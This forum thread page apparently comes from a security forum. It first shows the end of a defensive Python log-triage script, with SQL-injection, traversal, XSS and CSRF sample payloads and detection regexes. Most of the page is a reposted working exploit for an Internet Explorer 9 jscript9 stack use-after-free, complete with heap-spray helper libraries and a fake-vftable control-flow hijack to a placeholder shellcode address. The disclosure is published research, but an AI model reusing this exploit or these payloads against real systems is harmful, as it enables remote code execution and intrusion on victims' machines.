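    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

RULES = [  # applied to the decoded path, query keys and query values
    ("sqli-time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("sqli-union",      re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b", re.I)),
    ("sqli-tautology",  re.compile(r"(?:'|\))\s*(or|and)\s+\d+\s*(=\s*\d+)?\s*(--|#)", re.I)),
    ("path-traversal",  re.compile(r"(?:^|[/\\])\.\.(?:[/\\]|$)")),
    ("xss-script-tag",  re.compile(r"<\s*script\b", re.I)),
]
ADMIN_CGI = re.compile(r"^/form2\w+\.cgi$")   # the ARG-W4 config handlers
ROUTER_HOSTS = frozenset({"192.168.1.1"})     # assumption: the device's own address


def decode_target(target):
    """Path, query keys and query values, percent-decoded twice so that a
    double-encoded payload (%2527 -> %27 -> ') is seen in its final form."""
    parts = urlsplit(target)
    pairs = parse_qsl(parts.query, keep_blank_values=True)   # decodes once
    pieces = [parts.path] + [k for k, _ in pairs] + [v for _, v in pairs]
    return "\n".join(unquote_plus(unquote_plus(p)) for p in pieces)


def triage_line(line, own_hosts=ROUTER_HOSTS):
    """Return {'ip', 'target', 'hits'} for a parseable line, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m["target"])
    hits = [name for name, rx in RULES if rx.search(decoded)]
    if m["method"] == "POST" and ADMIN_CGI.match(urlsplit(m["target"]).path):
        ref_host = urlsplit(m["referer"]).hostname if m["referer"] != "-" else None
        if ref_host not in own_hosts:   # form submitted from another origin: CSRF shape
            hits.append("cross-origin-admin-post")
    return {"ip": m["ip"], "target": m["target"], "hits": hits}


def triage(lines, own_hosts=ROUTER_HOSTS):
    """Only the lines that tripped at least one rule, in log order."""
    results = (triage_line(l, own_hosts) for l in lines)
    return [r for r in results if r and r["hits"]]


SAMPLE_LOG = [  # constructed lines; payloads are the ones the PoCs in this thread show
    '203.0.113.7 - - [17/Dec/2016:10:00:01 +0000] "GET /path-to-wordpress/%27%29%20AND%20%28SELECT%20%2a%20FROM%20%28SELECT%28SLEEP%285-%28IF%28%27a%27%3D%27a%27%2C0%2C5%29%29%29%29%29FPYG%29%20AND%20%28%27SQL%27%3D%27SQL HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [17/Dec/2016:10:00:02 +0000] "GET /index.php?controller=calendar&format=raw&cat%5B0%5D=6%29+OR+1--+-&task=events HTTP/1.1" 200 8810 "-" "Mozilla/5.0"',
    '192.168.1.23 - - [17/Dec/2016:10:00:03 +0000] "GET /cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=%3Cscript%3Ealert%28%22c_C%22%29%3C/script%3E HTTP/1.1" 200 1200 "http://192.168.1.1/" "Mozilla/5.0"',
    '192.168.1.23 - - [17/Dec/2016:10:00:04 +0000] "GET /cgi-bin/webproc?getpage=../../../../etc/passwd&var:menu=setup&var:page= HTTP/1.1" 200 900 "http://192.168.1.1/" "Mozilla/5.0"',
    '192.168.1.23 - - [17/Dec/2016:10:00:05 +0000] "POST /form2userconfig.cgi HTTP/1.1" 302 0 "http://evil.example/csrf.html" "Mozilla/5.0"',
    '192.168.1.23 - - [17/Dec/2016:10:00:06 +0000] "POST /form2userconfig.cgi HTTP/1.1" 302 0 "http://192.168.1.1/userconfig.htm" "Mozilla/5.0"',
    '198.51.100.4 - - [17/Dec/2016:10:00:07 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(r["ip"], ",".join(r["hits"]), r["target"][:60])
```

    The rules are deliberately narrow (a literal SLEEP(/BENCHMARK( call, a quote-or-paren followed by OR/AND and a comment, a dot-dot path segment, a script tag) so they produce few false positives on ordinary traffic; the time-based SQL injection in particular is otherwise easy to miss because the response is a normal 200 and only the latency changes. A Referer check catches the CSRF forms as posted, but browsers can omit the header, so the rule should be read as a triage signal rather than a control.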
  15. M0RF!N

    Microsoft Internet Explorer 9 jscript9 - JavascriptStackWalker Memory Corruption

    <!--
    Source: http://blog.skylined.nl/20161206001.html

    Synopsis

    A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. A pointer set up to point to certain data on the stack can be used after that data has been removed from the stack. This results in a stack-based analog to a heap use-after-free vulnerability. The stack memory where the data was stored can be modified by an attacker before it is used, allowing remote code execution.

    Known affected software and attack vectors

    Microsoft Internet Explorer 9

    An attacker would need to get a target user to open a specially crafted web-page. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.

    Repro.html:

    <!doctype html>
    <script>
      var oWindow = window.open("about:blank");
      oWindow.execScript('window.oURIError = new URIError();oURIError.name = oURIError;')
      try { "" + oWindow.oURIError; } catch(e) { }
      try { "" + oWindow.oURIError; } catch(e) { }
    </script>

    Description

    A Javascript can construct an URIError object and set that object's name property to refer to the URIError object, creating a circular reference. When that Javascript then attempts to convert the URIError object to a string, MSIE attempts to convert the URIError object's name to a string, which creates a recursive code loop that eventually causes a stack exhaustion. MSIE attempts to handle this situation gracefully by generating a JavaScript exception. While generating the exception, information about the call stack is gathered using the JavascriptStackWalker class. It appears that the code that does this initializes a pointer variable on the stack the first time it is run, but re-uses it if it gets called a second time. Unfortunately, the information the pointer points to is also stored on the stack, but is removed from the stack after the first exception is handled. Careful manipulation of the stack during both exceptions allows an attacker to control the data the pointer points to during the second exception. This problem is not limited to the URIError object: any recursive function call can be used to trigger the issue, as shown in the exploit below.

    Exploit

    As mentioned above, the vulnerable pointer points to valid stack memory during the first exception, but it is "popped" from the stack before the second. In order to exploit this vulnerability, the code executed during the first exception is going to point this pointer to a specific area of the stack, while the code executed during the second is going to allocate certain values in that same area before the pointer is re-used.

    Control over the stack contents during a stack exhaustion can be achieved by making the recursive calls with many arguments, all of which are stored on the stack. This is similar to a heap-spray storing values on large sections of the heap in that it is not entirely deterministic, but the odds are very high in favor of you setting a certain value at a certain address.

    The exploit triggers the first exception by making recursive calls using a lot of arguments. In each loop, a lot of stack space is needed to make the next call. At some point there will not be enough stack space left to make another call and an exception is thrown. If N arguments are passed during each call, N*4 bytes of stack are needed to store them. The number of bytes left on the stack at the time of the exception varies from 0 to about 4*N and thus averages to about 4*N/2. The vulnerable pointer gets initialized to point to an address near the stack pointer at the time of the exception, at approximately (bottom of stack) + 4*N/2.

    The exploit then triggers another stack exhaustion by making recursive calls using many arguments, but significantly less than before. If M arguments are passed during each call this time, the number of bytes left on the stack at the time of the exception averages to about 4*M/2. When the second exception happens, the vulnerable pointer points inside the stack that was "sprayed" with function arguments. This means we can control where it points to. The pointer is used as an object pointer to get a function address from a vftable, so by using the right value to spray the stack, we can gain full control over execution flow.

    The below schematic shows the layout of the stack during the various stages of this exploit:

    |<- bottom of stack                                       top of stack ->|
    |                                                                        |
    | Stack layout at the moment the first exception is triggered:           |
    |                                                                        |
    | [--- CALL X ---][-- CALL X-1 --][-- CALL X-2 --][...........]          |
    |{---------------} Stack space available is less than 4*N bytes          |
    |   ^^^                                                                  |
    |   Vulnerable pointer gets initialized to point around here             |
    |                                                                        |
    | Stack layout at the moment the second exception is triggered:          |
    |                                                                        |
    | [CALL Y][CALL Y-1][CALL Y-2][CALL Y-3][CALL Y-3][......................]|
    |{--} Stack space available is less than 4*M bytes                       |
    |   ^^^                                                                  |
    |   Vulnerable pointer still points around here, most likely at          |
    |   one of the arguments pushed onto the stack in a call.                |

    In the Proof-of-Concept code provided below, the first exception is triggered by recursively calling a function with 0x2000 arguments (N = 0x2000). The second exception is triggered by recursively calling a function with 0x200 arguments (M = 0x200). The values passed as arguments during the second stack exhaustion are set to cause the vulnerable pointer to point to a fake vftable on the heap. The heap is sprayed to create this fake vftable. A fake function address is stored at 0x28000201 (pTarget) that points to a dummy shellcode consisting of int3's at 0x28000300 (pShellcode). Once the vulnerability is triggered, the vulnerable pointer is used to read the pointer to our shellcode from our fake vftable and called, which will attempt to execute our shellcode.

    Sploit.html:
    -->
    <!doctype html>
    <script src="String.js"></script>
    <script src="sprayHeap.js"></script>
    <script>
      function stackOverflowHighOnStack() {
        stackOverflowHighOnStack.apply(0, new Array(0x2000));
      }
      function attack(pTarget) {
        var axArgs = [];
        while (axArgs.length < 0x200) axArgs.push((pTarget - 0x69C) >>> 1);
        exceptionLowOnStackWithSpray();
        function exceptionLowOnStackWithSpray() {
          try {
            (function(){}).apply(0, axArgs);
          } catch (e) {
            throw 0;
          }
          exceptionLowOnStackWithSpray.apply(0, axArgs);
        }
      }
      var pSprayStartAddress = 0x09000000;
      var dHeapSprayTemplate = {};
      var pTarget = 0x28000201;
      var pShellcode = 0x28000300;
      dHeapSprayTemplate[pTarget] = pShellcode;
      dHeapSprayTemplate[pShellcode] = 0xCCCCCCCC;
      window.sHeapSprayBlock = createSprayBlock(dHeapSprayTemplate);
      window.uHeapSprayBlockCount = getSprayBlockCount(dHeapSprayTemplate, pSprayStartAddress);
      var oWindow = window.open("about:blank");
      function prepare() {
        window.asHeapSpray = new Array(opener.uHeapSprayBlockCount);
        for (var i = 0; i < opener.uHeapSprayBlockCount; i++) {
          asHeapSpray[i] = (opener.sHeapSprayBlock + "A").substr(0, opener.sHeapSprayBlock.length);
        }
      }
      oWindow.eval("(" + prepare + ")();");
      try {
        String(oWindow.eval("({toString:" + stackOverflowHighOnStack + "})"));
      } catch(e) {
        oWindow.eval("(" + attack + ")(" + pTarget + ")");
      }
    </script>
    <!--
    String.js:

    String.fromWord = function (wValue) {
      // Return a BSTR that contains the desired DWORD in its string data.
      return String.fromCharCode(wValue);
    }
    String.fromWords = function (awValues) {
      // Return a BSTR that contains the desired DWORD in its string data.
      return String.fromCharCode.apply(0, awValues);
    }
    String.fromDWord = function (dwValue) {
      // Return a BSTR that contains the desired DWORD in its string data.
      return String.fromCharCode(dwValue & 0xFFFF, dwValue >>> 16);
    }
    String.fromDWords = function (auValues) {
      var asDWords = new Array(auValues.length);
      for (var i = 0; i < auValues.length; i++) {
        asDWords[i] = String.fromDWord(auValues[i]);
      }
      return asDWords.join("");
    }
    String.prototype.repeat = function (uCount) {
      // Return the requested number of concatenated copies of the string.
      var sRepeatedString = "",
          uLeftMostBit = 1 << (Math.ceil(Math.log(uCount + 1) / Math.log(2)) - 1);
      for (var uBit = uLeftMostBit; uBit > 0; uBit = uBit >>> 1) {
        sRepeatedString += sRepeatedString;
        if (uCount & uBit) sRepeatedString += this;
      }
      return sRepeatedString;
    }
    String.createBuffer = function(uSize, uIndexSize) {
      // Create a BSTR of the right size to be used as a buffer of the requested size, taking into account the 4 byte
      // "length" header and 2 byte "\0" footer. The optional argument uIndexSize can be 1, 2, 4 or 8, at which point the
      // buffer will be filled with indices of said size (this is slower but useful for debugging).
      if (!uIndexSize) return "\uDEAD".repeat(uSize / 2 - 3);
      var auBufferCharCodes = new Array((uSize - 4) / 2 - 1);
      var uMSB = uIndexSize == 8 ? 8 : 4; // Most significant byte.
      for (var uCharIndex = 0, uByteIndex = 4; uCharIndex < auBufferCharCodes.length; uCharIndex++, uByteIndex +=2) {
        if (uIndexSize == 1) {
          auBufferCharCodes[uCharIndex] = uByteIndex + ((uByteIndex + 1) << 8);
        } else {
          // Set high bits to prevent both NULLs and valid pointers to userland addresses.
          auBufferCharCodes[uCharIndex] = 0xF000 + (uByteIndex % uIndexSize == 0 ? uByteIndex & 0xFFF : 0);
        }
      }
      return String.fromCharCode.apply([][0], auBufferCharCodes);
    }
    String.prototype.clone = function () {
      // Create a copy of a BSTR in memory.
      sString = this.substr(0, this.length);
      sString.length;
      return sString;
    }
    String.prototype.replaceDWord = function (uByteOffset, dwValue) {
      // Return a copy of a string with the given dword value stored at the given offset.
      // uOffset can be a value beyond the end of the string, in which case it will "wrap".
      return this.replaceWord(uByteOffset, dwValue & 0xFFFF).replaceWord(uByteOffset + 2, dwValue >> 16);
    }
    String.prototype.replaceWord = function (uByteOffset, wValue) {
      // Return a copy of a string with the given word value stored at the given offset.
      // uOffset can be a value beyond the end of the string, in which case it will "wrap".
      if (uByteOffset & 1) {
        return this.replaceByte(uByteOffset, wValue & 0xFF).replaceByte(uByteOffset + 1, wValue >> 8);
      } else {
        var uCharIndex = (uByteOffset >>> 1) % this.length;
        return this.substr(0, uCharIndex) + String.fromWord(wValue) + this.substr(uCharIndex + 1);
      }
    }
    String.prototype.replaceByte = function (uByteOffset, bValue) {
      // Return a copy of a string with the given byte value stored at the given offset.
      // uOffset can be a value beyond the end of the string, in which case it will "wrap".
      var uCharIndex = (uByteOffset >>> 1) % this.length,
          wValue = this.charCodeAt(uCharIndex);
      if (uByteOffset & 1) {
        wValue = (wValue & 0xFF) + ((bValue & 0xFF) << 8);
      } else {
        wValue = (wValue & 0xFF00) + (bValue & 0xFF);
      }
      return this.substr(0, uCharIndex) + String.fromWord(wValue) + this.substr(uCharIndex + 1);
    }
    String.prototype.replaceBufferDWord = function (uByteOffset, uValue) {
      // Return a copy of a BSTR with the given dword value stored at the given offset.
      if (uByteOffset & 1) throw new Error("uByteOffset (" + uByteOffset.toString(16) + ") must be Word aligned");
      if (uByteOffset < 4) throw new Error("uByteOffset (" + uByteOffset.toString(16) + ") overlaps BSTR size dword.");
      var uCharIndex = uByteOffset / 2 - 2;
      if (uCharIndex == this.length - 1) throw new Error("uByteOffset (" + uByteOffset.toString(16) + ") overlaps BSTR terminating NULL.");
      return this.substr(0, uCharIndex) + String.fromDWord(uValue) + this.substr(uCharIndex + 2);
    }

    sprayHeap.js:

    console = window.console || {"log": function(){}};
    function bad(pAddress) {
      // convert a valid 32-bit pointer to an invalid one that is easy to convert
      // back. Useful for debugging: use a bad pointer, get an AV whenever it is
      // used, then fix pointer and continue with exception handled to see what
      // happens next.
      return 0x80000000 + pAddress;
    }
    function blanket(dSpray_dwValue_pAddress, pAddress) {
      // Can be used to store values that indicate offsets somewhere in the heap
      // spray. Useful for debugging: blanket region, get an AV at an address
      // that indicates where the pointer came from. Does not overwrite addresses
      // at which data is already stored.
      for (var uOffset = 0; uOffset < 0x40; uOffset += 4) {
        if (!((pAddress + uOffset) in dSpray_dwValue_pAddress)) {
          dSpray_dwValue_pAddress[pAddress + uOffset] = bad(((pAddress & 0xFFF) << 16) + uOffset);
        }
      }
    }
    var guSprayBlockSize = 0x02000000; // how much fragmentation do you want?
    var guSprayPageSize = 0x00001000; // block alignment.
// Different versions of MSIE have different heap header sizes: var sJSVersion; try{ /*@cc_on @*/ sJSVersion = eval("@_jscript_version"); } catch(e) { sJSVersion = "unknown" }; var guHeapHeaderSize = { "5.8": 0x24, "9": 0x10, // MSIE9 "unknown": 0x10 }[sJSVersion]; // includes BSTR length var guHeapFooterSize = 0x04; if (!guHeapHeaderSize) throw new Error("Unknown script version " + sJSVersion); function createSprayBlock(dSpray_dwValue_pAddress) { // Create a spray "page" and store spray data at the right offset. var sSprayPage = "\uDEAD".repeat(guSprayPageSize >> 1); for (var pAddress in dSpray_dwValue_pAddress) { sSprayPage = sSprayPage.replaceDWord(pAddress % guSprayPageSize, dSpray_dwValue_pAddress[pAddress]); } // Create a spray "block" by concatinated copies of the spray "page", taking into account the header and footer // used by MSIE for larger heap allocations. var uSprayPagesPerBlock = Math.ceil(guSprayBlockSize / guSprayPageSize); var sSprayBlock = ( sSprayPage.substr(guHeapHeaderSize >> 1) + sSprayPage.repeat(uSprayPagesPerBlock - 2) + sSprayPage.substr(0, sSprayPage.length - (guHeapFooterSize >> 1)) ); var uActualSprayBlockSize = guHeapHeaderSize + sSprayBlock.length * 2 + guHeapFooterSize; if (uActualSprayBlockSize != guSprayBlockSize) throw new Error("Assertion failed: spray block (" + uActualSprayBlockSize.toString(16) + ") should be " + guSprayBlockSize.toString(16) + "."); console.log("createSprayBlock():"); console.log(" sSprayPage.length: " + sSprayPage.length.toString(16)); console.log(" uSprayPagesPerBlock: " + uSprayPagesPerBlock.toString(16)); console.log(" sSprayBlock.length: " + sSprayBlock.length.toString(16)); return sSprayBlock; } function getHeapBlockIndexForAddress(pAddress) { return ((pAddress % guSprayPageSize) - guHeapHeaderSize) >> 1; } function getSprayBlockCount(dSpray_dwValue_pAddress, pStartAddress) { pStartAddress = pStartAddress || 0; var pTargetAddress = 0x0; for (var pAddress in dSpray_dwValue_pAddress) { pTargetAddress = 
Math.max(pTargetAddress, pAddress); } uSprayBlocksCount = Math.ceil((pTargetAddress - pStartAddress) / guSprayBlockSize); console.log("getSprayBlockCount():"); console.log(" pTargetAddress: " + pTargetAddress.toString(16)); console.log(" uSprayBlocksCount: " + uSprayBlocksCount.toString(16)); return uSprayBlocksCount; } function sprayHeap(dSpray_dwValue_pAddress, pStartAddress) { var uSprayBlocksCount = getSprayBlockCount(dSpray_dwValue_pAddress, pStartAddress); // Spray the heap by making copies of the spray "block". var asSpray = new Array(uSprayBlocksCount); asSpray[0] = createSprayBlock(dSpray_dwValue_pAddress); for (var uIndex = 1; uIndex < asSpray.length; uIndex++) { asSpray[uIndex] = asSpray[0].clone(); } return asSpray; } Time-line 13 October 2012: This vulnerability was found through fuzzing. 29 October 2012: This vulnerability was submitted to EIP. 18 November 2012: This vulnerability was submitted to ZDI. 27 November 2012: EIP declines to acquire this vulnerability because they believe it to be a copy of another vulnerability they already acquired. 7 December 2012: ZDI declines to acquire this vulnerability because they believe it not to be exploitable. During the initial report detailed above, I did not have a working exploit to prove exploitability. I also expected the bug to be fixed soon, seeing how EIP believed they already reported it to Microsoft. However, about two years later, I decided to look at the issue again and found it had not yet been fixed. Apparently it was not the same issue that EIP reported to Microsoft. So, I decided to try to have another look and developed a Proof-of-Concept exploit. April 2014: I start working on this case again, and eventually develop a working Proof-of-Concept exploit. 6 November 2014: ZDI was informed of the new analysis and reopens the case. 15 November 2014: This vulnerability was submitted to iDefense. 
16 November 2014: iDefense responds to my report email in plain text, potentially exposing the full vulnerability details to world+dog. 17 November 2014: ZDI declines to acquire this vulnerability after being informed of the potential information leak. 11 December 2012: This vulnerability was acquired by iDefense. The accidentally potential disclosure of vulnerability details by iDefense was of course a bit of a disappointment. They reported that they have since updated their email system to automatically encrypt emails, which should prevent this from happening again. 9 June 2015: Microsoft addresses this vulnerability in MS15-056. 6 December 2016: Details of this vulnerability are released. -->

History of the Iran Cyber Security Forum

Iran Cyber Security Company began its work in 2009, employing specialists in the field of security and providing solutions in network security and database security.

With a new definition of service provision and consulting in the field of security for organizations and centers, penetration testing, and software development, and in constructive interaction with organizations, this company has made customer focus the cornerstone of its work and is ready to cooperate with various companies and institutions.

Compliance with the Law

The Iran Cyber Security Company and Forum, given their legal and official presence in security circles and security assessment companies, are obliged to comply with the law, and forum users are likewise obliged to comply with the laws of the Islamic Republic of Iran.
